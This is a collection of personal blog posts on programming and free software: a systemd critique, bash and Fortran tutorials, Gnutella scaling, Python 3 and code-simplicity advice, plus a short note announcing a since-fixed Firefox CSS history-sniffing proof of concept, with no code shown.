Myth

  • Linux-specific3 (are you serious??). This makes the distribution an add-on to the kernel instead of the distribution being a focus point of many different development efforts. This is a second point where distributions become commodities, and as for systemd itself, this is against the interest of the distributions. On the other hand, enabling the use of many different kernels strengthens the Distribution - even if currently only few people are using them. Why being Linux-only is a bad idea for distributions: Strategy Letter V: Commodities

  • Requiring an up-to-date kernel. This problem already gives me lots of headaches for my OLPC due to udev (from the same people as systemd… which is one of the reasons why I hope that Gentoo-devs will succeed with eudev), since it is not always easy to go to a newer kernel when you’re on a fringe platform (I’m currently fighting with that). An init system should not require some special kernel version just to boot… Why those hard dependencies are a bad idea: Bloatware and the 80/20 Myth AND Strategy Letter V: Commodities

  • Requiring D-Bus. D-Bus was already broken a few times for me, and losing not just some KDE functionality but instead making my system unbootable is unacceptable. It’s bad enough that so much stuff relies on udev.4

In my understanding, we need more services which can survive without the others, so the system gets resilient against failures in a given part. As the system gets more and more complex, this constantly gets more important: Less interdependencies, and the services which are crucial to get my system in a debuggable state should be small and simple - and should not require many changes to implement new features.

Having multiple tools to solve the same problem looks like wasted resources, but actually this extends the range of problems which can be solved with our systems and avoids bottlenecks and single points of failure (either tools or communities), so it makes us resilient. Also it encourages standard-formats to minimize the cost of maintaining several systems side-by-side.

You can see how systemd manages to violate all these principles…

This does not mean, that the features provided by systemd are useless. It says that the way they are embedded in systemd with its heavy dependencies is detrimental to a healthy distribution.

Note: I am neither a developer of systemd, nor of upstart, sysvinit or OpenRC. I am just a humble user of distributions, but I can recognize impending horrible fallout when I see it.

References:

I’ll finish this with a quote from 30 myths about systemd, written by the systemd developers themselves:

We try to get rid of many of the more pointless differences of the various distributions in various areas of the core OS. As part of that we sometimes adopt schemes that were previously used by only one of the distributions and push it to a level where it's the default of systemd, trying to gently push everybody towards the same set of basic configuration.
— Lennart Poettering, main developer of systemd

I could not show much clearer why distributions should be very wary about systemd than Lennart Poettering does here in the post where he tries to refute myths about systemd.

PS: I’m definitely biased against systemd, after having some horrifying experiences with kernel-dependencies in udev. Resilience looks different. And I already modified some init scripts to adjust my systems behavior so it better fits my usecase. Now go and call me part of a fringe group which wants to add “pointless differences” to the system. If you force Gentoo devs to issue a warning in the style of “you MUST activate feature X in your kernel, else your system will become unbootable”, this should be a big red flag to you that you’re doing something wrong. If you do that twice, this is a big red flag to users not to trust your software. And regaining that trust requires reestablishing a long record of solid work. Which I do not see at the moment. Also do read Bloatware and the 80/20 Myth (if you didn’t do that by now): It might be true that 80% of the users only use 20% of the features, but they do not use the same 20%.


  1. Update 2014: Actually there is no need to guess how the systemd developers will act: They showed (again) that they will keep breaking systems of their users: “udev now silently fails to do anything useful if devtmpfs is missing, almost as if resilience was a disease” — bonsaikitten, Gentoo developer, 2014-01, long after udev was subsumed into systemd. 

  2. Running a program in a subshell increases the runtime by just six milliseconds. I measured that when testing ways to run GNU Guile modules as scripts. So you have to start almost 100 subshells during bootup to lose half a second of runtime. Note that OpenRC can boot a system and power down again in under 0.7 seconds and the minimal boot-to-login just takes 250 ms. There is no need for systemd to get a faster boot. 

  3. The systemd proponents in the debian initsystem discussion explicitly stated that they don’t want to port systemd to other kernels. 

  4. And D-Bus is slow, slow, slow when your system is under heavy memory and IO-pressure, as my systems tend to be (I’m a Gentoo user. I often compile a new version of all KDE-components or of Firefox while I do regular work on the computer). From dbus I’m used to reaction times up to several seconds… 

Translating a lookup-dictionary to bash: Much simpler than I thought

I wanted to name Transcom Regions in my plots by passing their names to the command-line tool, but I only had their region-number and a lookup dictionary in Python. To avoid tampering with the tool, I needed to translate the dictionary to a bash function, and thanks to the case statement it was much simpler than I had expected.

This is the original dictionary:

#: Names of transcom regions
transcomregionnames = {
    1: "NAM Boreal",
    2: "NAM Temperate",
    3: "South American tropical",
    # and so forth
}

This is how lookup works in Python:

region = 2
name = transcomregionnames[2]

The solution in bash is a simple mechanic translation:

function regionname () {
    number="$1"
    case $number in
        1) echo "NAM Boreal";;
        2) echo "NAM Temperate";;
        3) echo "South American tropical";;
        # and so forth
    esac
}

And the lookup is easier than anything I hoped for:

region=2
name=$(regionname $region)

This is how it looks in my actual code:

for region in {1..22} ; do ./plotstation.py -c /home/arne/sun-work/ct-tccon/ct-tccon-2015-5x7-use-obspack-no-tccon-nc/ -C "GA: in-situ ground and aircraft"  -c /home/arne/sun-work/ct-tccon/ct-tccon-2015-5x7-use-obspack-use-tccon-noassimeu/ -C "TneGA: non-European TCCON and GA" -c /home/arne/sun-work/ct-tccon/ct-tccon-2015-5x7-use-obspack-no-tccon-no-aircraft-doesitbreaktoo/ -C "G: in-situ ground"  --regionfluxtimeseries $region --toaverage 5 --exclude-validation  --colorscheme paulforabp --linewidth 4 --font-size 36 --start 2009-12-03 --stop 2012-12-02  --title "Effect of assimilating non-EU TCCON, $(regionname ${region})"  -o ~/flux-GA-vs-TneGA-vs-G-region-${region}.pdf; done

For your convenience, here’s my entire transcom naming function:

function regionname () {
    number="$1"
    case $number in
        1) echo "NAM Boreal" ;;
        2) echo "NAM Temperate";;
        3) echo "South American tropical";;
        4) echo "South American temperate";;
        5) echo "Northern Africa";;
        6) echo "Southern Africa";;
        7) echo "Eurasian Boreal";;
        8) echo "Eurasian Temperate";;
        9) echo "Tropical Asia";;
        10) echo "Australia";;
        11) echo "Europe";;
        12) echo "North Pacific Temperate";;
        13) echo "West Pacific Tropics";;
        14) echo "East Pacific Tropics";;
        15) echo "South Pacific Temperate";;
        16) echo "Northern Ocean";;
        17) echo "North Atlantic Temperate";;
        18) echo "Atlantic Tropics";;
        19) echo "South Atlantic Temperate";;
        20) echo "Southern Ocean";;
        21) echo "Indian Tropical";;
        22) echo "South Indian Temperate";;
    esac
}

Happy Hacking!

Weltenwald-theme under AGPL (Drupal)

After the last round of polishing, I decided to publish my theme under AGPLv3. Reason: If you use AGPL code and people access it over a network, you have to offer them the code. Which I hereby do ;)
That’s the only way to make sure that website code stays free.

It’s still for Drupal 5, because I didn’t get around to port it, and it has some ugly hacks, but it should be fully functional.

Just untar it in any Drupal 5 install.

tar xjf weltenwald-theme-2010-08-05_r1.tar.bz2

Maybe I’ll get around to properly package it in the future…

Until then, feel free to do so yourself :)

And should I change the theme without posting a new layout here, just drop me a line and I’ll upload a new version — as required by AGPL. And should you have some problem, or if something should be missing, please drop me a line, too.

No screenshot, because a live version kicks a screenshot any day ;)
(in case it isn’t clear: Weltenwald is the theme I use on this site)

AnhangGröße
weltenwald-theme-2010-08-05_r1.tar.bz2877.74 KB

Which language is best, C, C++, Python or Java?

My answer to the question about the best language on Quora. If you continue reading from here, please stick with me to the end. Ready to read to the end? Enjoy the ride!

My current answer is: Scheme ☺ It gives me a large degree of freedom to explore ways to program which were much harder hard to explore in Python, C++ and Java. That’s why I’m currently switching from Python to Scheme.1

But depending on my current step on the road to improve my skills2 and the development group and project, that answer might have been any other language — C, C++, Java, Python, Fortran, R, Ruby, Haskell, Go, Rust, Clojure, ….

Therefore this answer is as subjective as most other answers, because we have no context on your personal situation nor on the people with whom you’ll work and from whom you can learn or the requirements of the next project you want to tackle.

Put another way:

The only correct answer is “it depends”.

The other answers in this thread should help you find the right answer for you.

Why Gnutella scales quite well

You might have read in some (almost ancient) papers, that a network like Gnutella can't scale. So I want to show you, why the current Version of Gnutella does scale, and does it well.

In earlier versions, up to v0.4, Gnutella was a a pure broadcast network. That means, that every search request did reach every participant, so the number of search requests hitting each node was for an optimal network exactly equal to the number of requests, made by nodes who were in the network. And you can see easily why that can't scale.
But that was only true for Gnutella 0.4.

In the current incarnation of Gnutella (Gnutella 0.6), Gnutella is no longer a pure Broadcast network. Instead, only the smallest percentage of the traffic is done via broadcast.

If you want to read about the methods used to realize this, please have a look at the GnuFU guide (english, german).

Here I want to limit it to the statement, that the first two hops of a search request are governed via Dynamic Querying, which stops the request as soon as it has enough sources (this stops a search as soon as it gets about 250 results), and that the last two hops are governed via the Query Routing Protocol, which ensures, that a search request reaches only those hosts, which can actually have the file (which is only about 5% of the nodes).

So in todays reality, Gnutella is a quite structured and very flexible network.

To scale it, Ultrapeers can increase their number of connections from their current 32 upwards, which makes Dynamic Querying (DQ) and the Query Routing Protocol (QRP) even more effective.

In the case of DQ most queries for popular files will still provide enough results after the same number of clients have been contacted, so increasing the number of connections won't change the network traffic at all which is caused by the first two steps.

In the case of QRP, queries wil still only reach the hosts, which can have the file, and if Ultrapeers are connected to more nodes at the same time (by increasing the number of connections), it will provide more results for each connection, so DQ will stop even earlier than with fewer connections per Ultrapeer.

So Gnutella is now far from a broadcast model, and the act of increasing the size of the Gnutella Network can even increase its efficiency for popular files.

For rare files, QRP kicks in with full force, and even though DQ will likely check all other nodes for content, QRP will make sure that only those nodes are reached, which can have the content, which might be only 0.1% of the net or even far less.

Here, increasing the number of nodes per Ultrapeer means that nodes with rare files are in effect closer to you than before, so Gnutella also gets more efficient when you increase the network size, when rare file searches are your major concern.

So you can see, that Gnutella has become a network, which scales extremly well for keyword searches, and due to that it can also very efficiently be used to search for metadata and similar concepts.

The only thing which Gnutella can't do well are searches for strings which aren't seperate words (for example file-hashes), because that kills QRP, so they will likely not reach (m)any hosts. For these types of searches, the Gnutella developers work on a DHT (Distributed Hash Table), which will only be used, if the string can't be split into seperate words, and that DHT will most likely be Kademlia, which is also proven to work quite well.

And with that, the only problem which remains in need of fixing is spam, because that inhibits DQ when you do a rare search, but I am sure that the devs will also find a way to stop spamming, and even with spam, Gnutella is quite effective and consumes very little bandwidth, when you are acting as a leaf, and only moderate bandwidth when you are acting as ultrapeer.

Some figures as finishing touch:

  • Leaf network traffic: About 1kB/s if you add outgoing and incoming traffic, which is about the seventh part of the speed of a 56k modem.
  • Ultrapeer traffic: About 7kB/s, outgoing and incoming added together, which is about one full ISDN line of less than 1/8th of a DSLs outgoing speed.

Have fun with Gnutella!
- ArneBab 08:14, 15. Nov 2006 (CET)

PS: This guide ignores, that requests must travel through intermediate nodes. But since those nodes make up only about 3% of the network and only 3% of those nodes will be reached by a (QRP-routed) rare file request, it seems safe to ignore these 0.1% of the network in the calculations for the sake of making it easier to follow them mentally (QRP takes care of that).

Why Python 3?

At the Institute we use both Python 2 and Python 3. While researching the current differences (Python 3.5, compared to Python 2.7), I found two beautiful articles by Brett Cannon, the current manager of Python, and summarized them for my work group.

The articles:

  1. Why Python 3: Why Python3 exists
  2. Why use 3: How to pitch Python 3 to Management

The relevant points for us1 are the following:

  1. Why Python 3 was necessary:

    • Python2: string = byte-array.
      • Py3 avoids Encoding-Bugs in Unicode: all Strings are Unicode.
    • Python2: sources in ASCII. β in a comment needed # encoding: utf-8
      • Py3 uses utf-8 in source files by default.
    • Last chance: the cost of the chance increased every year.
  2. Why use 3 (relevant for us, e.G. for new projects):

    • int/long -> int
    • Unicode in Code: σ = sqrt(var) # only letters, but i.e. not Σ
    • H.dot(β) -> H @ β
    • chained exceptions: Traceback ... during handling ... Traceback — simplifies debugging
    • print() facilitates structured output2

The effect of these points is much larger than this short text suggests: avoid surprises, avoid awkward workarounds, and easier debugging.


  1. I have summarized them because I can not expect scientists (or other people who only use Python) to read the full articles, just to decide what they do when they get the channce to tackle a new project. 

  2. Example for print():
    nums = [1, 2, 3]
    with open("data.csv", "a") as f:
        print(*nums, sep=";", file=f) 

Write programs you can still hack when you feel dumb

Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it. — Brian Kernighan

In the article Hyperfocus and balance, Arc Riley from PySoy talks about trying to get to the Hyperfocus state without endangering his health. Since I have similar needs, I am developing some strategies for that myself (though not for my health, but because my wife and children can’t be expected to let me work 8h without any interruptions in my free time).

Different from Arc, I try to change my programming habits instead of changing myself to fit to the requirements of my habits.1

Easy times

Let’s begin with Programming while you feel great.

The guideline I learned from writing PnP roleplaying games is to keep the number of things to know at 7 or less at each point (according to Miller, 1956; though the current best guess of the limitation for average humans is only 4 objects!). For a function of code I would convert that as follows:

  1. You need to keep in mind the function you work in (location), and
  2. the task it should perform (purpose and effect), and
  3. the resources it uses (arguments or global values/class attributes).

Only 4 things left for the code of your function. (three if you use both class attributes/global values and function arguments. Two, if you have complex custom data-structures with peculiar names or access-methods which you have to understand for doing anything. One if you also have to remember the commands of an unfamiliar2 editor or VCS tool. See how fast this approaches zero even when starting with 7 things?)

Add an if-switch, for-loop or similar and you have only 3 things left.

You need those for what the function should actually do, so better put further complexities into subfunctions.

Also ensure that each of the things you work with is easy enough. If you get the things you use down to 7 by writing functions with 20 arguments, you don’t win anything. Just the resources you could use in the function will blow your mind when you try to change the function a few months later. This goes for every part of your program: The number of functions, the number of function arguments, the number of variables, the lines of code per function and even the number of hierarchy levels you use to reduce the other things you need to keep in mind at any given time.

Hard times

But if you want to be able to hack that code while you feel dumb (compared to those streaks of genius when you can actually hold the whole structure of your program in your head and forsee every effect of a given change before actually doing it), you need to make sure that you don’t have to take all 7 things into account.

Tune it down for the times when you feel dumb by starting with 5 things.3 After substracting one for the location, for the task and for the resources, you are left with only two things:

Two things for your function. Some Logic and calling stuff are 2 things.

If it is an if-switch, let it be just an if-switch calling other functions.4 Yes, it may feel much easier to do it directly here, when you are fully embedded in your code and feel great, but it will bite you when you are down. Which is exactly when you won’t want to be bitten by your own code.

Loose coupling and tight cohesion

Programming is a constant battle against complexity. Stumble from the sweet spot of your program into any direction, and complexity raises its ugly head. But finding the sweet spot requires constant vigilance, as it shifts with the size and structure of your program and your development group.

To find a practical way of achieving this, Django’s concept of loose coupling and tight cohesion (more detailed) helped me most, because it reduces the interdependencies.

The effects of any given change should be contained in the part of the code you work in - and in one type of code.

As web framework, Django seperates the templates, the URI definitions, the program code and the database access from each other. (see how these are already 4 categories, hitting the limit of our mind again?)

For a game on the other hand, you might want to seperate story, game logic, presentation (what you see on the screen) and input/user actions. Also people who write a scenario or level should only have to work in one type of code, neatly confined in one file or a small set of files which reside in the same place.

And for a scientific program, data input, task definition, processing and data output might be separated.

Remember that this separation does not only mean that you put those parts of the code into different files, but that they are loosely coupled:5

They only use lean and clearly defined interfaces and don’t need to know much about each other.

Conclusions

This strategy does not only make your program easier to adapt (because the parts you need to change for implementing a given feature are smaller). If you apply it not only to the bigger structure, but to every part of the program, it’s main advantage is that any part of the code can be understood without having to understand other parts.

And you can still understand and hack your code, when your child is sick, your wife is overworked, you slept 3 hours the night before - and can only work for half an hour straight, because it’s evening and you don’t want to be a creep (but this change has to be finished nontheless).

Note that finding a design which accomplishes this is far more complex than it sounds. If people can read your code and say “oh, that’s easy. I can hack that” (and manage to do so), then you did it right.

Designing a simple structure to solve a complex task is far harder than designing a complex structure to solve that task.

And being able to hack your program while you feel dumb (and maybe even hold it in your head) is worth investing some of your genius-time6 into your design (and repeating that whenever your code grows too hairy).

PS (7 years later): This only applies to the version of your code that stays in your codebase. During short-term experiments these rules do not apply, because there you still have the newly written code in your head. But take pains to clean it up before it takes on a life of its own. The last point for that is when you realize that you’re no longer sure how it works (then you know that you already missed the point of refactoring, but you can at least save your colleagues and your future self from stumbling even worse than you do at that moment). That way you also always have some leeway in short-term complexity that you can use during future experimentation. Also don’t make your code too simple: If you find that you’re bored while coding or that you spend more time fighting the structures you built than solving the actual problems, you took these principles too far, because you’re no longer getting full benefits from your brain. Well chosen local complexity reduces global complexity and the required work per change.


  1. Where I got bitten badly by my high-performance coding habits is the keyboard layout evolution program. I did not catch my error when the structure grew too complex (while adding stuff), and now that I do not have as much uninterrupted time as before, I cannot work on it efficiently anymore. I’m glad that this happened with a mostly finished project on whoose evolution no ones future depended. Still it is sad that this will keep me from turning it into a realtime visual layout optimizer. I can still work on its existing functionality (I kept improving it for the most importang task: the cost calculation), but adding new functionality is a huge pain. 

  2. This limit only applies to unfamiliar things: things you did not yet learn well enough that they work automatically. Once you know a tool well enough that you don’t have to think about it anymore, it no longer counts against the 7 thing limit, since you don’t need to remember it.7 That’s strong support for writing conventional code — or at least code you’ll still write similarly a decade later — and using tools which can accompany you for a long time. 

  3. See how I actually don’t get below 5 here? A good TODO list which shows you the task so you can forget it while coding might get you down to 4. But don’t bet on it. Not knowing where you are or where you want to go are recipes for desaster… And if you make your functions too small, the collection of functions gets more complex, or the object hierarchy too deep, adding complexity at other places and making it harder to change the structure (refactor) when requirements change. Well, no one said creating well-structured programs would be easy. You need to find the right compromise for you. 

  4. Keeping functions simple does not mean that they must be extremely short. If you have a library which provides many tools that get used for things like labelling axes in a plot, and you don’t get much repetition between different functions, then having a function of 20 to 30 lines can be simpler than building an abstraction which only works at the current state of the code but will likely break when you add the next function. This is inherent, function-local complexity: you cannot reduce it with structure. Therefore the sweet spot of simplicity for some tasks is using medium-sized functions. If you find yourself repeating exactly the same code multiple times, however, you likely missed the sweet spot and should investigate shortening the functions by extracting the common tasks, or restructuring the function to separate semantically different tasks. 

  5. In all your structures, do keep program performance in mind. If your structure imposes high performance penalties, you will have to break it more and more as you push it beyond the limits you deemed reasonable at the beginning. And then it adds complexity instead of reducing it. When programming, you always have two audiences. One are humans: your program must be easy to understand and change. If it is not, it will rot. The other is the machine: your program must be sufficiently efficient to execute. If it is not, that will bite you when you push it where it was never meant to go. And you will. If it grows somewhat successful and you get any competition, even if it is much worse, you cannot afford a rewrite. The full rewrite is the number one strategic mistake you should never make. So while you keep one eye on easy structures for humans, keep the other eye on performance for the machine. 

  6. How to find your genius time? That’s a tautology: Your genius time is when you can hold your program in your mind. If I could tell you when your genius time occurs, or even how to trigger it, I could make lots of money by consulting about every tech company in existence. A good starting point is reading about “flow”, known in many other creative activities (some starting points). Reaching the flow often includes spending time outside the flow, so best write programs you can still hack when you feel dumb.8 

  7. This is reasoning from experience. I think the actual reason why people can juggle large familiar structures is more likely that they have an established mental model which allows them to use multiple dimensions and cut the amount of bits you need for referring to the thing.9 See the Absolute Judgments of Multidimensional Stimuli section, the recoding section and the difference between chunks and bits in George A. Miller (1956). This is part of writing programs you can still hack when you feel dumb — but one which only helps those who use the same structures and one which binds you to your established coding style. 

  8. And in all this reduction of local complexity, keep in mind that there is no silver bullet (Brooks, 1986). Just take care that you design your code against the limits of the humans who work with it, and only in the second place against the limits of the tools you use — you can change the tools, but you cannot easily change the humans; often you cannot change the humans at all. In the best case you can make your tools fit and expand the limits of humans. But remember also that your code must run well enough on the machine. And you often do not know what "well enough" means. I know that this is not a simple answer. If that irks you, keep in mind that there is no silver bullet (Brooks, 1986), and this text isn’t one either. It’s just a step on the way — I hope it is useful to you. 

  9. Aside from being able to remember the full mental model, it is often enough to remember something close enough and then find the correct answer with assisted guessing. A typical example is narrowing down auto-completion candidates by matching on likely names until something feels right. This is how good auto-completion — or rather: guided interactive code inspection — massively expands the size of models we can work with efficiently. It depends on easily guessable naming, typically aided by experience, and it benefits from tools which can limit or order the potential candidates by the context. With good tool-support it suffices to have a general feeling about the direction to take for doing something. The guidelines in this article should help you with guessing, and should help your tool with limiting candidates to plausible choices and with ordering them by context. 

Writing a commandline tool in Fortran

Here I want to show you how to write a commandline tool in Fortran. Because Fortran is much better than its reputation — most of all in syntax. I needed a long time to understand that — to get over my predjudices — and I hope I can help you save some of that time.1

This provides a quick-start into Fortran. After finishing it, I suggest having a look at Fortran surprises to avoid stumbling over differences between Fortran and many other languages.

The first program: Hello world :)

Code to be executed when the program runs is enclosed in program and end program:

program hello
  use iso_fortran_env
  write (output_unit,*) "Hello World!"
  write (output_unit,*) 'Hello Single Quote!'
end program hello

Call this fortran-hello.f90 (.f is for the old Fortran 77).

The fastest free compiler is gfortran.

gfortran -std=gnu -O3 fortran-hello.f90 -o fortran-hello
./fortran-hello
Hello World!
Hello Single Quote!

That’s it. This is your first commandline tool.

Reading arguments

Most commandline tools accept arguments. Fortran-developers long resisted this and preferred explicit configuration files, but with 2003 argument parsing entered the standard. The tool for this is get_command_argument.

program cli
  implicit none ! no implicit declaration: all variables must be declared
  character(1000) :: arg

  call get_command_argument(1, arg) ! result is stored in arg, see 
  ! https://gcc.gnu.org/onlinedocs/gfortran/GET_005fCOMMAND_005fARGUMENT.html

  if (len_trim(arg) == 0) then ! no argument given
      write (*,*) "Call me --world!"
  else
      if (trim(arg) == "--world") then
          call get_command_argument(2, arg)
          if (len_trim(arg) == 0) then
              arg = "again!"
          end if
          write (*,*) "Hello ", trim(arg)
          ! trim reduces the fixed-size array to non-blank letters
      end if
  end if
end program
gfortran -std=gnu -O3 fortran-commandline.f90 -o fortran-helloworld
./fortran-helloworld
./fortran-helloworld --world World
./fortran-helloworld --world
Call me --world!
Hello World
Hello again!

Adding structure with modules

The following restructures the program into modules. If you used any OO tool, you know what this does. use X, only : a, b, c gets a, b and c from module x.

Note that you have to declare all variables used in the function at the top of the function.

module hello
  implicit none
  character(100),parameter :: prefix = "Hello" ! parameters are constants
  public :: parse_args, prefix
contains
  function parse_args() result ( res )
    implicit none
    character(1000) :: res

    call get_command_argument(1, res)  
    if (trim(res) == "--world") then
        call get_command_argument(2, res)
        if (len_trim(res) == 0) then
            res = "again!"
        end if
    end if
  end function parse_args
end module hello

program helloworld
  use hello, only : parse_args, prefix
  implicit none
  character(1000) :: world
  world = parse_args()
  write (*,*) trim(prefix), " ", trim(world)
end program helloworld
gfortran -std=gnu -O3 fortran-modules.f90 -o fortran-modules
./fortran-modules --world World
Hello World

You can also declare functions as pure (free from side effects). I did not yet check whether the compiler enforces that already, but if it does not do it now, you can be sure that this will be added. Fortran compilers are pretty good at enforcing what you tell them. Do see the fortran surprises for a few hints on how to tell them what you want.

Performance considerations

Fortran is fast, really fast. But if you come from C, you need to retrain a bit: The inner loop is the first part of the reference, while with C it is the last part.

The following tests the speed difference when looping over the outer or the inner part. You can get a factor 3-5 difference by having the tight inner loop go over the inner part of the multidimensional array.

Note the L1 cache comments: If you want to get really fast with any language, you cannot ignore the capabilities of your hardware.

Also note that this code works completely naturally on multidimensional arrays.

! Thanks to http://infohost.nmt.edu/tcc/help/lang/fortran/time.html
program cheaplooptest
  integer :: i,j,k,s
  integer, parameter :: n=150 ! 50 breaks 32KB L1 cache, 150 breaks 256KB L2 cache
  integer,dimension(n,n,n) :: x, y
  real etime
  real elapsed(2)
  real total1, total2, total3, total4
  y(:,:,:) = 0
  x(:,:,:) = 1
  total1 = etime(elapsed)
  print *, "start time ", total1
  ! first index as outer loop
  do s=1,n
     do i=1,n
        do j=1,n
           y(i,j,:) = y(i,j,:) + x(i,j,:)
        end do
     end do
  end do
  total2 = etime(elapsed)
  print *, "time for outer loop", total2 - total1
  ! first index as inner loop is much cheaper (difference depends on n)
  do s=1,n
     do k=1,n
        do j=1,n
           y(:,j,k) = y(:,j,k) + x(:,j,k)
        end do
     end do
  end do
  total3 = etime(elapsed)
  print *, "time for inner loop", total3-total2
  ! plain copy is slightly faster still
  do s=1,n
     y = y + x
  end do
  total4 = etime(elapsed)
  print *, "time for simple loop", total4-total3

end program cheaplooptest
gfortran -std=gnu -O3 fortran-faster.f90 -o fortran-faster
./fortran-faster
start time    2.33319998E-02
time for outer loop   19.0533314    
time for inner loop  0.799999237    
time for simple loop  0.729999542    

This now seriously looks like Python, but faster by factor 5 to 20, if you do it right (avoid the outer loop).

Just to make it completely clear: The following is how the final test code looks (without the additional looping which make it slow enough to time it).

program cleanloop
  integer, parameter :: n=150 ! 50 breaks 32KB L1 cache, 150 breaks 256KB L2 cache
  integer,dimension(n,n,n) :: x, y
  y(:,:,:) = 0
  x(:,:,:) = 1
  y = y + x
end program cleanloop

That’s it. If you want to work with any multidimensional stuff like matrices, that’s in most cases exactly what you want. And fast.

A full tool: base60

The previous tools were partial solutions. The following is a complete solution, including numerical work (which is where Fortran really shines). And setting the numerical precision. I’m sharing it in total, so you can see everything I needed to do to get it working well.

This implements newbase60 by tantek.

It could be even nicer, if I could find an elegant way to add complex numbers to the task :)

module base60conv
  implicit none ! if you use this here, the module must come before the program in gfortran
  ! constants: marked as parameter: not function parameters, but
  ! algorithm parameters!
  character(len=61), parameter :: base60chars = "0123456789"&
       //"ABCDEFGHJKLMNPQRSTUVWXYZ_abcdefghijkmnopqrstuvwxyz"
  integer, parameter :: longlong = selected_int_kind(32) ! length up to 32 in base10, int(16)
  integer(longlong), parameter :: sixty = 60
  public :: base60chars, numtosxg, sxgtonum, longlong
  private ! rest is private
contains
  function numtosxg( number ) result ( res )
    implicit none
    !!! preparation
    ! input: ensure that this is purely used as input.
    ! intent is only useful for function arguments.
    integer(longlong), intent(in) :: number
    ! work variables
    integer(longlong) :: n
    integer(longlong) :: remainder
    ! result
    character(len=1000) :: res ! do not initialize variables when
    ! declaring them: That only initializes
    ! at compile time not at every function
    ! call and thus invites nasty errors
    ! which are hard to find.  actual
    ! algorithm
    if (number == 0) then
       res = "0"
       return
    end if
    ! calculate the base60 string

    res = "" ! I have to explicitely set res to "", otherwise it
    ! accumulates the prior results!
    n = number ! the input argument: that should be safe to use.
    ! catch number = 0
    do while(n > 0)
       ! in the first loop, remainder is initialized here.
       remainder = mod(n, sixty)
       n = n/sixty
       ! note that fortran indizes start at 1, not at 0.
       res = base60chars(remainder+1:remainder+1)//trim(res)
       ! write(*,*) number, remainder, n
    end do
    ! numtosxg = res
  end function numtosxg

  function sxgtonum( base60string ) result ( number )
    implicit none
    ! Turn a base60 string into the equivalent integer (number)
    character(len=*), intent(in) :: base60string
    integer :: i ! running index
    integer :: idx, badchar ! found index of char in string
    integer(longlong) :: number
    ! integer,dimension(len_trim(base60string)) :: numbers ! for later openmp
    badchar = verify(base60string, base60chars)
    if (badchar /= 0) then ! one not
       write(*,"(a,i0,a,a)") "# bad char at position ", badchar, ": ", base60string(badchar:badchar)
       stop 1 ! with OS-dependent error code 1
    end if

    number = 0
    do i=1, len_trim(base60string)
       number = number * 60
       idx = index(base60chars, base60string(i:i), .FALSE.) ! not backwards
       number = number + (idx-1)
    end do
    ! sxgtonum = number
  end function sxgtonum

end module base60conv

program base60
  ! first step: Base60 encode. 
  ! reference: http://faruk.akgul.org/blog/tantek-celiks-newbase60-in-python-and-java/
  ! 5000 should be 1PL
  use base60conv
  implicit none

  integer(longlong) :: tests(14) = (/ 5000, 0, 100000, 1, 2, 60, &
       61, 59, 5, 100000000, 256, 65536, 215000, 16777216 /)
  integer :: i, badchar ! index for the for loop
  integer(longlong) :: n ! the current test to run
  integer(longlong) :: number
  ! program arguments
  character(1000) :: arg
  call get_command_argument(1, arg) ! modern fortran 2003!
  if (len_trim(arg) == 0) then ! run tests
     ! I have to declare the return type of the function in the main program, too.
     ! character(len=1000) :: numtosxg
     ! integer :: sxgtonum
     ! test the functions.
     do i=1,size(tests) 
        n = tests(i)
        write(*,"(i12,a,a,i12)") n, " ", trim(numtosxg(n)), sxgtonum(trim(numtosxg(n)))
     end do
  else
     if (trim(arg) == "-r") then
        call get_command_argument(2, arg)
        badchar = verify(arg, " 0123456789")
        if (badchar /= 0) then
           write(*,"(a,i0,a,a)") "# bad char at position ", badchar, ": ", arg(badchar:badchar)
           stop 1 ! with OS-dependent error code 1
        end if
        read (arg, *) number ! read from arg, write to number
        write (*,*) trim(numtosxg(number))
     else
        write (*,*) sxgtonum(arg)
     end if
  end if
end program base60
gfortran -std=gnu -O3 fortran-base60.f90 -o fortran-base60
./fortran-base60 P
./fortran-base60 h
./fortran-base60 D
./fortran-base60 PhD
factor $(./fortran-base60 PhD) # yes, it’s prime! :)
./fortran-base60 -r 85333
./fortran-base60 "!" || echo $?
echo "^ with error code on invalid input :)"
 23
 42
 13
 85333
85333: 85333
 PhD
# bad char at position 1: !
1
^ with error code on invalid input :)

Conclusion

Fortran done right looks pretty clean. It does have its warts, but not more than all the other languages which are stable enough that the program you write today will still run in 10 years to come. And it is fast. And free.

Why I’m writing this? To save you a few years of lost time I spent adjusting my mistaken distaste for a pretty nice language which got a bad reputation because it once was the language everyone had to learn to get anything done (with sufficient performance). And its code did once look pretty bad, but that’s long become ancient history — except for the tools which were so unbelievably good that they are still in use 40 years later.

You can ask "what makes a programming language cool?". One easily overlooked point is: Making your programs still run three decades later. That doesn’t look fancy and it doesn’t look modern, but it brings a lot of value.

And if you use it where it is strong, Fortran is almost as easy to write as Python, but a lot faster (in terms of CPU requirement for the whole task) with much lower resource consumption (in terms of memory usage and startup time). Should you now ask "what about multiprocessing?", then have a look at OpenMP.


  1. After I finished my Diploma, I thought of Fortran as "this horribly unreadable 70th language". I thought it should be removed and that it only lived on due to pure inertia. I thought that its only deeper use were to provide the libraries to make numeric Python faster. Then I actually had to use it. In the beginning I mocked it and didn’t understand why anyone would choose Fortran over C. What I saw was mostly Fortran 77. The first thing I wrote was "Fortran surprises" — all the strange things you can stumble over. But bit by bit I realized the similarities with Python. That well-written Fortran actually did not look that different from Python — and much cleaner than C. That it gets stuff done. This year Fortran turns 60 (heise reported in German). And I understand why it is still used. And thanks to being an ISO standard it is likely that it will stick with us and keep working for many more decades. 

AnhangGröße
2017-04-10-Mo-fortran-commandline-tool.pdf172.84 KB
2017-04-10-Mo-fortran-commandline-tool.org14.01 KB

Your browser history can be sniffed with just 64 lines of Python (tested with Firefox 3.5.3)

Update: The basic bug shown here is now fixed in Firefox. Read on to see whether the fix works for you. Keep in mind that there are much stronger attacks than the one shown here. Use private mode to reduce the amount of data your Browser keeps. What’s not there cannot be claimed.

After the example of making-the-web, I was quite intrigued by the ease of sniffing the history via simple CSS tricks.

- Firefox Bug report - finally resolved fixed.
- Start Panic! - a site dedicated to spreading the news about the vulnerability.

So I decided to test, how small I get a Python program which can sniff the history via CSS - without requiring any scripting ability on the browser-side.

I first produced fully commented code (see server.py) and then stripped it down to just 64 lines (server-stripped.py), to make it really crystal clear, that making your browser vulnerable to this exploit is a damn bad idea. I hope this will help get Firefox fixed quickly.

